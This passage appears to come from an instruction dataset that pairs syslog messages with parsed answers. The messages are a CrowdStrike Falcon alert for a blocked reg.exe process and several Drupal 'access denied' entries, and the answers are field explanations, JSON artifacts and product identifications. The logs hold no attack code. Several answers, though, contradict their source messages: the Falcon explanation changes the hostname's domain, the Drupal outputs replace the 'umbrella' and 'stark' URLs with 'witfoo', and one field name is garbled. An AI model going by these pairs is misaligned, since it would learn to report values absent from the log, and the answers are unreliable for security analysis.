tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"fish","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: 19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf
filename: reg.exe
filepath: \Device\HarddiskVolume1\Windows\System32\reg.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-09T17:22:37Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 156.27.51.231
userName: fish | Explain this syslog message |
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2 | {
"action": "block",
"facilitycode": 16,
"facilitylabel": "local0",
"localhostname": "shareholders",
"localstarttime": "Aug 31 10:43:49",
"message": "<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2",
"messagetype": "management_message",
"priority": 132,
"program": "drupal",
"senderhost": "10.1.16.76",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "1693478629",
"tags": [
"rfc3164",
"block",
"https://shareholders.witfoo.com",
"access denied",
"management_message",
"drupal",
"node/2"
],
"uri": "https://shareholders.witfoo.com/",
"vendorcode": "0",
"streamName": "drupal",
"clientIP": "65.47.142.125"
} | Create a JSON artifact from the message |
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2 | Product: drupal
Vendor: drupal | Identify this syslog message |
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2 | This is a syslog message from a product called drupal by drupal. The following fields were extracted from the message:
action: block
facilitycode: 16
facilitylabel: local0
localhostname: shareholders
localstarttime: Aug 31 10:43:49
messagetype: management_message
priority: 132
program: drupal
senderhost: 10.1.16.76
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 1693478629
tags: ['rfc3164', 'block', 'https://shareholders.witfoo.com', 'access denied', 'management_message', 'drupal', 'node/2']
uri: https://shareholders.witfoo.com/
vendorcode: 0
streamName: drupal
clientIP: 65.47.142.125 | Explain this syslog message |
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2 | {
"action": "block",
"facilitycode": 16,
"facilitylabel": "local0",
"localhostname": "shareholders",
"localstarttime": "Aug 31 10:43:49",
"message": "<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2",
"messagetype": "management_message",
"priority": 132,
"program": "drupal",
"senderhost": "10.1.16.76",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "1693478629",
"tags": [
"rfc3164",
"block",
"https://shareholders.witfoo.com",
"access denied",
"management_message",
"drupal",
"node/2"
],
"uri": "https://shareholders.witfoo.com/",
"vendorcode": "0",
"streamName": "drupal",
"clientIP": "22.133.118.103"
} | Create a JSON artifact from the message |
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2 | Product: drupal
Vendor: drupal | Identify this syslog message |
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2 | This is a syslog message from a product called drupal by drupal. The following fields were extracted from the message:
action: block
facilitycode: 16
facilitylabel: local0
localhostname: shareholders
localstarttime: Aug 31 10:43:49
messagetype: management_message
priority: 132
program: drupal
senderhost: 10.1.16.76
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 1693478629
tags: ['rfc3164', 'block', 'https://shareholders.witfoo.com', 'access denied', 'management_message', 'drupal', 'node/2']
uri: https://shareholders.witfoo.com/
vendorcode: 0
streamName: drupal
clientIP: 22.133.118.103 | Explain this syslog message |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.